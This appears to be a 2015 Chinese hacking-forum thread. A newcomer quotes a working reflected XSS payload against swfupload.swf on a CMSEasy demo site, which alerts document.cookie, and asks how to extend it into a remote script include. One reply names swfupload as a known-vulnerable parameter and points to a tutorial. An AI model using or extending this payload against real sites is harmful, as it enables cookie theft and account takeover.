查看: 2417|回复: 2

新人求教:swf的xss如何构造包含文件语句,折腾了好久

[复制链接]

该用户从未签到

发表于 2015-1-11 14:18:26 | 显示全部楼层 |阅读模式
悬赏5i币未解决

如题,
乌云上的这个xss:wooyun.org/bugs/wooyun-2014-069833

示例的弹窗代码构造是:demo.cmseasy.cn/common/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

本人新人 不太懂js,研究了一整天都构造不好远程包含文件,希望各位大牛指点迷津!

实在走投无路了,谢谢大家!

回复

使用道具 举报

该用户从未签到

 楼主| 发表于 2015-1-11 14:43:14 | 显示全部楼层
没人吗
回复

使用道具 举报

  • TA的每日心情
    难过
    2016-9-20 18:51
  • 签到天数: 40 天

    [LV.5]常住居民I

    发表于 2015-1-14 12:40:58 | 显示全部楼层
    已知存在缺陷的FLASH文件名或参数名中就包含swfupload,详细你可以去看看心伤的瘦子的那些年系列XSS教程中http://www.wooyun.org/bugs/wooyun-2010-016532这篇,希望对你有帮助。
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 11:40 , Processed in 0.028161 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部